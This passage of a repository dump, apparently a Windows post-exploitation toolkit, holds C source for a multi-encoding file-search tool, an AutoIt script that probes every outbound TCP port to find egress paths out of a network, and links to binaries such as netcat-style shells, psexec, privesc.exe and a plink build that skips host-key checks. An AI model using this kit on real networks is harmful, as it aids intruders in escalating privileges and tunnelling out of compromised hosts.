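        if(((argv[i][0] != '-') && (argv[i][0] != '/')) || (strlen(argv[i]) != 2)) {
            break;
        }
        switch(argv[i][1]) {
            case 'I': g_sensitive = 1; break;
            case 'a': g_sparse = 1; break;
            case 'v': verbose = 1; break;
            default: {
                printf("\nError: wrong argument (%s)\n", argv[i]);
                exit(1);
            }
        }
    }

    g_string = argv[i++];
    if(i >= argc) {     /* the pattern must be followed by at least one file */
        printf("\nError: invalid options or missing arguments\n");
        exit(1);
    }
    /* cstring() rewrites the pattern in place; the copy keeps argv untouched
       (the author notes this is not strictly necessary) */
    g_string = strdup(g_string);
    g_stringsz = cstring(g_string, g_string, -1, NULL);
    if(g_stringsz <= 0) {
        /* cstring() returns -1 on a malformed escape, and an empty pattern
           would make mygrep() search with a zero/negative pattern length */
        printf("\nError: invalid or empty search string\n");
        exit(1);
    }

    for(; i < argc; i++) {
        /* snprintf rather than sprintf("%.*s", sizeof(filedir) - 1, ...):
           the "%.*s" precision must be an int, not a size_t; the result is
           truncated to the same 4095 characters */
        snprintf((char *)filedir, sizeof(filedir), "%s", argv[i]);
        if(verbose) printf("- %s\n", filedir);

        if(recursive_dir(filedir, sizeof(filedir)) < 0) {
            /* not a folder: queue it as a single file */
            add_files(filedir, 0, NULL);
        }
    }
    /* a NULL name presumably finalises the list and returns it */
    files = add_files(NULL, 0, &input_total_files);

    found = 0;
    for(i = 0; i < input_total_files; i++) {
        found += mygrep(files[i].name);
    }

    fprintf(stderr, "\n- %u patterns found\n", found);

    for(i = 0; i < input_total_files; i++) {
        free(files[i].name);
    }
    free(files);
    return(0);
}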
140 |
141 |
142 |
/* Encodes (src, srcsz) with `encode`, searches the result in buff with an
   exact (non-adiacent) find() and frees the temporary. Shared by the base64
   and hex passes, whose encoded pattern only lives for one find() call. */
static int find_encoded(u8 *fname, u8 *buff, int buffsz,
                        u8 *(*encode)(u8 *, int *), u8 *src, int srcsz,
                        int case_sensitive) {
    int encsz = srcsz;
    u8  *enc  = encode(src, &encsz);
    int hits  = find(fname, buff, buffsz, enc, encsz, 0, case_sensitive);
    free(enc);
    return hits;
}

/*
 * Searches one file for g_string in several representations and returns the
 * number of hits: the raw pattern, its UTF-16 widening, base64 of both, hex
 * of both (always case insensitive) and, with -a, the adiacent and sparse
 * passes on the raw pattern. A file that cannot be loaded is reported with
 * perror() and counted as 0 so the remaining files are still scanned.
 */
int mygrep(u8 *fname) {
    u8  *buff, *wide;
    int buffsz, widesz, total, k;

    buff = fdload(fname, &buffsz);
    if(!buff) {
        perror("\nError");
        return(0);
    }

    /* 1. pattern exactly as given */
    total = find(fname, buff, buffsz, g_string, g_stringsz, 0, g_sensitive);

    /* 2. UTF-16 widening: every byte followed by a zero byte; the final zero
          is left out of the length (original comment: "big/little endian
          compatible") */
    wide = calloc(g_stringsz, sizeof(short));
    if(!wide) std_err();
    for(k = 0; k < g_stringsz; k++) {
        wide[k * 2]       = g_string[k];
        wide[(k * 2) + 1] = 0;
    }
    widesz = (k * 2) - 1;
    total += find(fname, buff, buffsz, wide, widesz, 0, g_sensitive);

    /* 3. base64 of both forms */
    total += find_encoded(fname, buff, buffsz, base64_encode, g_string, g_stringsz, g_sensitive);
    total += find_encoded(fname, buff, buffsz, base64_encode, wide, widesz, g_sensitive);

    /* 4. hex of both forms, always case insensitive */
    total += find_encoded(fname, buff, buffsz, byte2hex, g_string, g_stringsz, 0);
    total += find_encoded(fname, buff, buffsz, byte2hex, wide, widesz, 0);

    /* 5. -a only: adiacent (10) and sparse (-256) passes on the raw pattern */
    if(g_sparse) {
        total += find(fname, buff, buffsz, g_string, g_stringsz, 10, g_sensitive);
        total += find(fname, buff, buffsz, g_string, g_stringsz, -256, g_sensitive);
    }

    free(wide);
    free(buff);
    return(total);
}
231 |
232 |
233 |
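/* Digit classification for the escape parser. Kept local so the check does
 * not depend on <ctype.h> and so that sscanf()'s leading-whitespace skipping
 * can be ruled out before a number is read. */
static int cstring_is_hex(int c) {
    return ((c >= '0') && (c <= '9')) ||
           ((c >= 'a') && (c <= 'f')) ||
           ((c >= 'A') && (c <= 'F'));
}

static int cstring_is_octal(int c) {
    return (c >= '0') && (c <= '7');
}

/*
 * Expand C-style backslash escapes from input into output.
 *
 * Recognised: \a \b \e \f \n \r \t \v \" \' \\ \? \. "\ " (a literal space),
 * \xHH (one or two hex digits) and \OOO (one to three octal digits, so "\0"
 * is a NUL byte). Any other byte after a backslash, or a backslash at the end
 * of the input, is an error.
 *
 * input     NUL-terminated source text
 * output    destination; receives at most maxchars bytes plus a terminating
 *           NUL, so it must be one byte larger than maxchars
 * maxchars  maximum number of bytes to produce; negative means unlimited
 * inlen     optional out: number of input bytes consumed
 * returns   number of bytes written (excluding the NUL), 0 when input or
 *           output is NULL, -1 on a malformed escape
 */
int cstring(u8 *input, u8 *output, int maxchars, int *inlen) {
    unsigned int n;
    int len;
    u8 *p, *o;

    if(!input || !output) {
        if(inlen) *inlen = 0;
        return(0);
    }

    p = input;
    o = output;
    while(*p) {
        // stop at the caller's limit; the terminator is still written below
        if((maxchars >= 0) && ((o - output) >= maxchars)) break;
        if(*p != '\\') {
            *o++ = *p++;
            continue;
        }
        p++;
        switch(*p) {
            case 0:     return(-1);          // dangling backslash
            case 'a':   n = '\a';   break;
            case 'b':   n = '\b';   break;
            case 'e':   n = 0x1b;   break;   // ESC; '\e' itself is a GCC extension
            case 'f':   n = '\f';   break;
            case 'n':   n = '\n';   break;
            case 'r':   n = '\r';   break;
            case 't':   n = '\t';   break;
            case 'v':   n = '\v';   break;
            case '\"':  n = '\"';   break;
            case '\'':  n = '\'';   break;
            case '\\':  n = '\\';   break;
            case '?':   n = '\?';   break;
            case '.':   n = '.';    break;
            case ' ':   n = ' ';    break;
            case 'x': {
                // sscanf() would silently skip blanks after "\x" and read a
                // number further on; require a real hex digit right away
                if(!cstring_is_hex(p[1])) return(-1);
                if(sscanf((char *)p + 1, "%02x%n", &n, &len) != 1) return(-1);
                if(len > 2) len = 2;
                p += len;
                break;
            }
            default: {
                // up to three octal digits; anything else is not an escape we know
                if(!cstring_is_octal(*p)) return(-1);
                if(sscanf((char *)p, "%3o%n", &n, &len) != 1) return(-1);
                if(len > 3) len = 3;
                p += (len - 1);  // the shared p++ below consumes the last digit
                break;
            }
        }
        *o++ = n;
        p++;
    }
    *o = 0;
    len = o - output;
    if(inlen) *inlen = p - input;
    return(len);
}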
296 |
297 |
298 |
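/*
 * Hex-encode data as lowercase ASCII with no separators ("AB" -> "4142").
 *
 * data    bytes to encode; NULL is treated as an empty string
 * size    in: number of bytes to encode. NULL or a negative value means
 *         "data is NUL-terminated, use strlen()" — the same convention as
 *         base64_encode(), which the original did not honour.
 *         out: length of the returned string (twice the input length)
 * returns a malloc()'d NUL-terminated string the caller frees; exits through
 *         std_err() when the allocation fails
 */
u8 *byte2hex(u8 *data, int *size) {
    static const u8 digits[] = "0123456789abcdef";
    int i, len;
    u8 *ret;

    if(!data) data = (u8 *)"";
    if(!size || (*size < 0)) len = strlen((char *)data);
    else                     len = *size;

    ret = malloc(((size_t)len * 2) + 1);
    if(!ret) std_err();
    for(i = 0; i < len; i++) {
        ret[i * 2]       = digits[(data[i] >> 4) & 15];
        ret[(i * 2) + 1] = digits[data[i] & 15];
    }
    ret[len * 2] = 0;
    if(size) *size = len * 2;
    return(ret);
}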
316 |
317 |
318 |
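/*
 * Standard base64 (RFC 4648 alphabet, '=' padding) of data.
 *
 * data    bytes to encode; NULL is treated as an empty string
 * size    in: number of bytes to encode; NULL or a negative value means
 *         "data is NUL-terminated, use strlen()"
 *         out: length of the returned string
 * returns a malloc()'d NUL-terminated string the caller frees, or NULL when
 *         the allocation fails
 *
 * The trailing 1- or 2-byte group is handled explicitly: the previous version
 * always read three bytes per round, so for an input whose length is not a
 * multiple of three it read past the end of data and let the bits of those
 * stray bytes leak into the last encoded characters.
 */
u8 *base64_encode(u8 *data, int *size) {
    static const u8 base[64] = {
        'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P',
        'Q','R','S','T','U','V','W','X','Y','Z','a','b','c','d','e','f',
        'g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v',
        'w','x','y','z','0','1','2','3','4','5','6','7','8','9','+','/'
    };
    int len, i, rem, a, b, c;
    u8 *buff, *p;

    if(!data) data = (u8 *)"";
    if(!size || (*size < 0)) {      // use size -1 for auto text size!
        len = strlen((char *)data);
    } else {
        len = *size;
    }

    // four output characters per started group of three input bytes, plus NUL
    buff = malloc((size_t)(((len + 2) / 3) << 2) + 1);
    if(!buff) return(NULL);

    p = buff;
    for(i = 0; (i + 3) <= len; i += 3) {
        a = data[i];
        b = data[i + 1];
        c = data[i + 2];
        *p++ = base[(a >> 2) & 63];
        *p++ = base[((a & 3) << 4) | ((b >> 4) & 15)];
        *p++ = base[((b & 15) << 2) | ((c >> 6) & 3)];
        *p++ = base[c & 63];
    }

    rem = len - i;                  // 0, 1 or 2 bytes left; never read beyond them
    if(rem == 1) {
        a = data[i];
        *p++ = base[(a >> 2) & 63];
        *p++ = base[(a & 3) << 4];
        *p++ = '=';
        *p++ = '=';
    } else if(rem == 2) {
        a = data[i];
        b = data[i + 1];
        *p++ = base[(a >> 2) & 63];
        *p++ = base[((a & 3) << 4) | ((b >> 4) & 15)];
        *p++ = base[(b & 15) << 2];
        *p++ = '=';
    }
    *p = 0;

    if(size) *size = p - buff;
    return(buff);
}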
358 |
359 |
360 |
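/*
 * Search buff for string and print every hit as " <offset> <fname>".
 *
 * fname            name printed next to each match
 * buff, buffsz     data to scan
 * string, stringsz pattern to look for
 * adiacent         0: contiguous match
 *                  >0: each pattern byte may sit up to 'adiacent' bytes after
 *                      the previous one
 *                  <0: each pattern byte is looked for within -adiacent bytes
 *                      on either side of the current position
 * case_sensitive   for the contiguous mode: non-zero compares with memcmp(),
 *                  zero with mymemicmp(). The gapped modes compare bytes
 *                  exactly and ignore this flag.
 * returns          number of matches printed; 0 for an empty pattern or one
 *                  longer than the buffer (the old code would have matched an
 *                  empty pattern at every offset)
 *
 * Reads the global 'verbose' to decide whether to hex-dump the pattern first.
 */
int find(u8 *fname, u8 *buff, int buffsz, u8 *string, int stringsz, int adiacent, int case_sensitive) {
    int i, x, res, found = 0;
    u8 *p, *l, *s, *end;

    if(!buff || !string || (stringsz <= 0) || (buffsz < stringsz)) return(0);

    if(verbose) {
        fputc('\n', stdout);
        show_dump(string, stringsz, stdout);
        fputc('\n', stdout);
    }

    end = buff + buffsz;
    l   = buff + (buffsz - stringsz);   // last offset where a contiguous match still fits

    if(adiacent) {
        for(p = buff; p <= l; p++) {
            if(p[0] != string[0]) continue;
            s = p;
            for(i = 0; i < stringsz; i++) {
                if(adiacent < 0) {
                    // sparse: probe -adiacent bytes on both sides of s, only
                    // while both directions stay inside the buffer
                    if((s + adiacent) < buff) break;
                    if((s - adiacent) >= l) break;
                    for(x = 0; x < -adiacent; x++) {
                        if(s[x] == string[i]) {
                            s += x;
                            break;
                        }
                        if(s[-x] == string[i]) break;   // NOTE(review): s is not moved on a backward hit
                    }
                    if(x >= -adiacent) break;
                } else {
                    // adjacent: the next pattern byte must turn up within
                    // 'adiacent' bytes. The old loop kept advancing s past the
                    // end of buff; stop at the boundary instead of reading it.
                    for(x = 0; x < adiacent; x++) {
                        if(s >= end) {
                            x = adiacent;
                            break;
                        }
                        if((*s++) == string[i]) break;
                    }
                    if(x >= adiacent) break;
                }
            }
            if(i >= stringsz) {
                printf(" %08x %s\n", (unsigned int)(p - buff), fname);
                found++;
                if(adiacent < 0) p = s;
            }
        }
    } else {
        for(p = buff; p <= l; p++) {
            if(case_sensitive) {
                res = memcmp(p, string, stringsz);
            } else {
                res = mymemicmp(p, string, stringsz);
            }
            if(!res) {
                printf(" %08x %s\n", (unsigned int)(p - buff), fname);
                found++;
            }
        }
    }
    return(found);
}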
422 |
423 |
424 |
/*
 * Case-insensitive comparison of len bytes (ASCII folding through tolower()).
 * Returns 0 when every byte matches and -1 at the first difference; unlike
 * memcmp() it reports equality only, not an ordering. A len <= 0 compares
 * nothing and returns 0.
 */
int mymemicmp(u8 *a, u8 *b, int len) {
    u8 *stop = a + len;

    while(a < stop) {
        if(tolower(*a++) != tolower(*b++)) return(-1);
    }
    return(0);
}
433 |
434 |
435 |
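/*
 * Read a whole file into a freshly malloc()'d, NUL-terminated buffer.
 *
 * fname   path to open in binary mode; NULL yields NULL
 * fsize   optional out: number of bytes actually read (0 when the buffer
 *         could not be allocated)
 * returns the buffer (caller frees), or NULL when the file cannot be opened
 *         or fstat()'d or its size does not fit an int; errno is left for
 *         the caller's perror()
 *
 * Honours the global 'verbose' for progress lines on stdout.
 */
u8 *fdload(u8 *fname, int *fsize) {
    struct stat xstat;
    FILE *fd;
    int size;
    u8 *buff;

    if(!fname) return(NULL);
    if(verbose) fprintf(stdout, "\n- %s\n", fname);
    fd = fopen((char *)fname, "rb");
    if(!fd) return(NULL);
    if(fstat(fileno(fd), &xstat) < 0) {
        fclose(fd);
        return(NULL);
    }
    // the size has to round-trip through int; size + 1 is computed in size_t
    // below so INT_MAX itself is still fine
    size = (int)xstat.st_size;
    if((xstat.st_size < 0) || ((off_t)size != xstat.st_size)) {
        fclose(fd);
        return(NULL);
    }
    buff = malloc((size_t)size + 1);
    if(buff) {
        // keep only what was really read: a short read (a directory opened
        // on POSIX, a file that shrank) must not leave uninitialised memory
        // in the part the caller scans
        size = (int)fread(buff, 1, size, fd);
        buff[size] = 0;
    } else {
        size = 0;
    }
    fclose(fd);
    if(fsize) *fsize = size;
    if(verbose) fprintf(stdout, "- %u bytes loaded\n", (unsigned int)size);
    return(buff);
}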
461 |
462 |
463 |
/*
 * Fatal-error exit: prints "Error: <strerror(errno)>" (preceded by a blank
 * line) on stderr and terminates the process with status 1. Never returns.
 */
void std_err(void) {
    static const char prefix[] = "\nError";

    perror(prefix);
    exit(1);
}
468 |
469 |
--------------------------------------------------------------------------------
/win32bins/mygrep/mygrep.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/mygrep/mygrep.exe
--------------------------------------------------------------------------------
/win32bins/mygrep/scan.h:
--------------------------------------------------------------------------------
1 | /*
2 | Copyright 2012 Luigi Auriemma
3 |
4 | This program is free software; you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation; either version 2 of the License, or
7 | (at your option) any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program; if not, write to the Free Software
16 | Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
17 |
18 | http://www.gnu.org/licenses/gpl-2.0.txt
19 | */
20 |
21 |
22 |
// One entry of the file list built by add_files(); the list handed back to the
// caller ends with an entry whose name is NULL.
typedef struct {
    u8 *name;           // strdup()'d path; the consumer frees it
    //int offset; // unused at the moment
    int size;           // size reported by the directory walk
} files_t;
// Optional wildcard ('*' and '?', matched case-insensitively by check_wildcard())
// a file name must satisfy to be added; NULL disables the filter. This is a
// definition, not a declaration, so the header belongs in a single translation unit.
u8 *filter_in_files = NULL;
29 |
30 |
31 |
/*
 * Match fname against wildcard, where '?' stands for exactly one character
 * and '*' for any run (including none); letters are compared through
 * tolower(). Returns 0 on a full match and -1 otherwise, including when
 * either argument is NULL.
 */
int check_wildcard(u8 *fname, u8 *wildcard) {
    u8 *f = fname, *w = wildcard;
    u8 *star = NULL;            // pattern position right after the last '*'

    if(!f || !w) return(-1);

    while(*f || *w) {
        if(!*w && !star) return(-1);          // pattern exhausted, no '*' to fall back on
        if(*w == '*') {
            star = ++w;
            continue;
        }
        if(!*f) break;                        // name exhausted while pattern remains
        if((*w == '?') || (tolower(*f) == tolower(*w))) {
            f++;
            w++;
            continue;
        }
        if(!star) return(-1);                 // plain mismatch with no '*' before it
        f++;                                  // let the last '*' absorb one more character
        w = star;
    }
    return((*f || *w) ? -1 : 0);
}
66 |
67 |
68 |
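/*
 * Accumulate file names in a private, static, growable list.
 *
 * Two modes, selected by ret_files:
 *  - ret_files == NULL: append a copy of fname with its size and return NULL.
 *    fname is dropped when filter_in_files is set and check_wildcard() rejects it.
 *  - ret_files != NULL: hand the list to the caller, terminated by an entry
 *    whose name is NULL; *ret_files receives the number of entries and the
 *    internal state is reset so a new list can be started. The caller owns
 *    the array and every name in it.
 *
 * Exits through std_err() when memory runs out.
 */
files_t *add_files(u8 *fname, int fsize, int *ret_files) {
    static int filesi = 0,          // entries used
               filesn = 0;          // entries allocated
    static files_t *files = NULL;
    files_t *ret;

    if(ret_files) {
        *ret_files = filesi;
        // trim to the exact size and append the NULL-name sentinel
        files = realloc(files, sizeof(files_t) * (filesi + 1));
        if(!files) std_err();
        files[filesi].name = NULL;
        files[filesi].size = 0;
        ret = files;
        filesi = 0;
        filesn = 0;
        files = NULL;
        return(ret);
    }

    if(!fname) return(NULL);
    if(filter_in_files && (check_wildcard(fname, filter_in_files) < 0)) return(NULL);

    if(filesi >= filesn) {
        filesn += 1024;             // grow in chunks to keep realloc() calls rare
        files = realloc(files, sizeof(files_t) * filesn);
        if(!files) std_err();
    }
    files[filesi].name = (u8 *)strdup((char *)fname);
    if(!files[filesi].name) std_err();   // an unnamed entry would break the scan later
    files[filesi].size = fsize;
    filesi++;
    return(NULL);
}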
103 |
104 |
105 |
106 | #define recursive_dir_skip_path 0
107 | //#define recursive_dir_skip_path 2
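/*
 * Walk filedir recursively and register every file found through add_files().
 *
 * filedir    buffer holding the directory path. It is reused as scratch space
 *            to build each child path and restored (the separator appended
 *            here is removed again) before returning, so it must be writable
 *            and filedirsz bytes long.
 * filedirsz  size of that buffer; a child path that does not fit aborts the walk
 * returns    0 on success; -1 when filedir could not be listed or a path
 *            overflowed. On Windows a plain file is reported with -1 and the
 *            caller registers it; elsewhere scandir() fails on a plain file,
 *            it is registered here and 0 is returned.
 *
 * "." and ".." are skipped. The Windows branch uses FindFirstFileEx() on the
 * NT family; the other branch uses scandir()/stat() and exits through
 * std_err() when stat() fails on an entry. recursive_dir_skip_path strips that
 * many leading characters from the stored names.
 */
int recursive_dir(u8 *filedir, int filedirsz) {
    int plen, namelen, ret = -1;

    if(!filedir) return(ret);
#ifdef WIN32
    static int winnt = -1;          // platform family, detected once
    OSVERSIONINFO osver;
    WIN32_FIND_DATA wfd;
    HANDLE hFind = INVALID_HANDLE_VALUE;

    if(winnt < 0) {
        osver.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
        GetVersionEx(&osver);
        if(osver.dwPlatformId >= VER_PLATFORM_WIN32_NT) {
            winnt = 1;
        } else {
            winnt = 0;
        }
    }

    plen = strlen(filedir);
    // no room for "\*.*": give up without touching the caller's path (jumping
    // to quit here would chop its last character)
    if((plen + 4) >= filedirsz) return(ret);
    strcpy(filedir + plen, "\\*.*");
    plen++;                         // plen now sits just past the separator

    if(winnt) { // required to avoid problems with Vista and Windows7!
        hFind = FindFirstFileEx(filedir, FindExInfoStandard, &wfd, FindExSearchNameMatch, NULL, 0);
    } else {
        hFind = FindFirstFile(filedir, &wfd);
    }
    if(hFind == INVALID_HANDLE_VALUE) goto quit;    // not a directory, or not listable
    do {
        if(!strcmp(wfd.cFileName, ".") || !strcmp(wfd.cFileName, "..")) continue;

        namelen = strlen(wfd.cFileName);
        if((plen + namelen) >= filedirsz) goto quit; // child path would overflow
        memcpy(filedir + plen, wfd.cFileName, namelen);
        filedir[plen + namelen] = 0;

        if(wfd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) {
            if(recursive_dir(filedir, filedirsz) < 0) goto quit;
        } else {
            add_files(filedir + recursive_dir_skip_path, wfd.nFileSizeLow, NULL);
        }
    } while(FindNextFile(hFind, &wfd));
    ret = 0;

quit:
    if(hFind != INVALID_HANDLE_VALUE) FindClose(hFind);
#else
    struct stat xstat;
    struct dirent **namelist;
    int n,
        i = 0;                      // always valid at quit, whichever path gets there

    n = scandir(filedir, &namelist, NULL, NULL);
    if(n < 0) {
        // not a listable directory: register it as a single file
        if(stat(filedir, &xstat) < 0) {
            fprintf(stderr, "**** %s", filedir);
            std_err();
        }
        add_files(filedir + recursive_dir_skip_path, xstat.st_size, NULL);
        return(0);
    }

    plen = strlen(filedir);
    if((plen + 1) >= filedirsz) {
        // no room for the separator: release the listing and leave filedir untouched
        for(i = 0; i < n; i++) free(namelist[i]);
        free(namelist);
        return(ret);
    }
    strcpy(filedir + plen, "/");
    plen++;                         // plen now sits just past the separator

    for(i = 0; i < n; i++) {
        if(!strcmp(namelist[i]->d_name, ".") || !strcmp(namelist[i]->d_name, "..")) {
            free(namelist[i]);      // the old loop skipped this free() and leaked both entries
            continue;
        }

        namelen = strlen(namelist[i]->d_name);
        if((plen + namelen) >= filedirsz) goto quit; // child path would overflow
        memcpy(filedir + plen, namelist[i]->d_name, namelen);
        filedir[plen + namelen] = 0;

        // stat() follows symlinks, so a link to a directory is descended into
        if(stat(filedir, &xstat) < 0) {
            fprintf(stderr, "**** %s", filedir);
            std_err();
        }
        if(S_ISDIR(xstat.st_mode)) {
            if(recursive_dir(filedir, filedirsz) < 0) goto quit;
        } else {
            add_files(filedir + recursive_dir_skip_path, xstat.st_size, NULL);
        }
        free(namelist[i]);
    }
    ret = 0;

quit:
    for(; i < n; i++) free(namelist[i]);    // entries not released yet after an early exit
    free(namelist);
#endif
    filedir[plen - 1] = 0;          // drop the separator, restoring the caller's path
    return(ret);
}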
210 |
211 |
--------------------------------------------------------------------------------
/win32bins/mygrep/show_dump.h:
--------------------------------------------------------------------------------
1 | /*
2 | Show_dump 0.1.1a
3 |
4 | Copyright 2004,2005,2006 Luigi Auriemma
5 |
6 | This program is free software; you can redistribute it and/or modify
7 | it under the terms of the GNU General Public License as published by
8 | the Free Software Foundation; either version 2 of the License, or
9 | (at your option) any later version.
10 |
11 | This program is distributed in the hope that it will be useful,
12 | but WITHOUT ANY WARRANTY; without even the implied warranty of
13 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
14 | GNU General Public License for more details.
15 |
16 | You should have received a copy of the GNU General Public License
17 | along with this program; if not, write to the Free Software
18 | Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
19 |
20 | http://www.gnu.org/licenses/gpl.txt
21 |
22 | This function, optimized for performance, writes the hex dump of a buffer
23 | to a stream
24 |
25 | Usage:
26 | show_dump(buffer, buffer_length, stdout);
27 | show_dump(buffer, buffer_length, fd);
28 | */
29 |
30 | #include
31 |
32 |
33 |
/*
 * Write a classic hex dump of len bytes at data to stream: 16 bytes per row,
 * each as two lowercase hex digits plus a space (48 columns), a two-column
 * gap, then the same bytes as characters with anything outside 0x20..0x7e
 * shown as '.', and a newline. A final short row keeps the column layout.
 */
void show_dump(unsigned char *data, unsigned int len, FILE *stream) {
    static const char digits[] = "0123456789abcdef";
    unsigned char line[67];                 /* 48 hex + 2 gap + 16 chars + '\n' */
    unsigned char *end = data + len;
    unsigned char *hexpos, *chrpos;
    unsigned int row, i;

    while(data < end) {
        row = (unsigned int)(end - data);
        if(row > 16) row = 16;

        memset(line, ' ', 50);              /* blank hex area and gap for this row */
        hexpos = line;
        chrpos = line + 50;
        for(i = 0; i < row; i++, data++) {
            hexpos[0] = digits[*data >> 4];
            hexpos[1] = digits[*data & 15];
            hexpos += 3;                    /* skip the separator column */
            *chrpos++ = ((*data < ' ') || (*data >= 0x7f)) ? '.' : *data;
        }
        *chrpos++ = '\n';

        fwrite(line, chrpos - line, 1, stream);
    }
}
67 |
68 |
--------------------------------------------------------------------------------
/win32bins/network/letmeoutofyournet/w00tw00t_incremental.au3:
--------------------------------------------------------------------------------
#NoTrayIcon
#Region ;**** Directives created by AutoIt3Wrapper_GUI ****
#AutoIt3Wrapper_UseUpx=n
#AutoIt3Wrapper_Change2CUI=y
#AutoIt3Wrapper_Run_Obfuscator=y
#Obfuscator_Parameters=/cs 1 /cn 1
#EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****
#include

; Outbound-connectivity probe: for every TCP port 0-65535 it requests
; http://<host>:<port>/test and prints the ports whose reply body is exactly
; "w00tw00t" followed by LF, i.e. the ports on which this machine can reach
; the letmeoutofyour.net test service. Results go to the console only.
TCPStartup()
$ip = TCPNameToIp('backup.letmeoutofyour.net')
ConsoleWrite("letmeoutofyour.net resolved to: " & $ip & @CRLF)
; Expected address of the service; when DNS returns anything else the script
; falls back to connecting by IP below.
$realip = '178.79.164.226'
If($ip == $realip) Then
ConsoleWrite("Correctly resolved letmeoutofyour.net, checking ports..." & @CRLF)
; NOTE(review): the name resolved above is backup.letmeoutofyour.net while
; the requests below go to old.letmeoutofyour.net — confirm this is intended.
For $i = 0 to 65535
Local $sData = InetRead("http://old.letmeoutofyour.net:" & $i & "/test")
; '&' binds tighter than '==', so this compares against "w00tw00t" & @LF
If BinaryToString($sData) == 'w00tw00t' & @LF Then
ConsoleWrite("Good on port: " & $i & @CRLF)
EndIf
Next
Else
ConsoleWrite("Couldn't resolve letmeoutofyour.net, using direct IP..." & @CRLF)
For $i = 0 to 65535
Local $sData = InetRead("http://178.79.164.226:" & $i & "/test")
If BinaryToString($sData) == 'w00tw00t' & @LF Then
ConsoleWrite("Good on port: " & $i & @CRLF)
EndIf
Next
EndIf
31 |
32 |
--------------------------------------------------------------------------------
/win32bins/network/letmeoutofyournet/w00tw00t_incremental.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/network/letmeoutofyournet/w00tw00t_incremental.exe
--------------------------------------------------------------------------------
/win32bins/network/ncat.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/network/ncat.exe
--------------------------------------------------------------------------------
/win32bins/network/plink.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/network/plink.exe
--------------------------------------------------------------------------------
/win32bins/network/plink_novrfy.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/network/plink_novrfy.exe
--------------------------------------------------------------------------------
/win32bins/network/readme.creole:
--------------------------------------------------------------------------------
1 | plink.exe - standard plink from putty site
2 | plink_novrfy.exe - plink build compiled so that it does not verify the SSH host key
--------------------------------------------------------------------------------
/win32bins/network/remote.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/network/remote.exe
--------------------------------------------------------------------------------
/win32bins/network/sbd.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/network/sbd.exe
--------------------------------------------------------------------------------
/win32bins/network/showmount.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/network/showmount.exe
--------------------------------------------------------------------------------
/win32bins/network/tcping.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/network/tcping.exe
--------------------------------------------------------------------------------
/win32bins/network/wget.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/network/wget.exe
--------------------------------------------------------------------------------
/win32bins/network/zebedee.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/network/zebedee.exe
--------------------------------------------------------------------------------
/win32bins/ntrights.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/ntrights.exe
--------------------------------------------------------------------------------
/win32bins/privesc.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/privesc.exe
--------------------------------------------------------------------------------
/win32bins/psexec.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/psexec.exe
--------------------------------------------------------------------------------
/win32bins/rawcap.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/rawcap.exe
--------------------------------------------------------------------------------
/win32bins/regedit_nogpo.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/regedit_nogpo.exe
--------------------------------------------------------------------------------
/win32bins/requires_cygwin/cygcrypto-0.9.8.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/requires_cygwin/cygcrypto-0.9.8.dll
--------------------------------------------------------------------------------
/win32bins/requires_cygwin/cyggcc_s-1.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/requires_cygwin/cyggcc_s-1.dll
--------------------------------------------------------------------------------
/win32bins/requires_cygwin/cygminires.dll:
--------------------------------------------------------------------------------
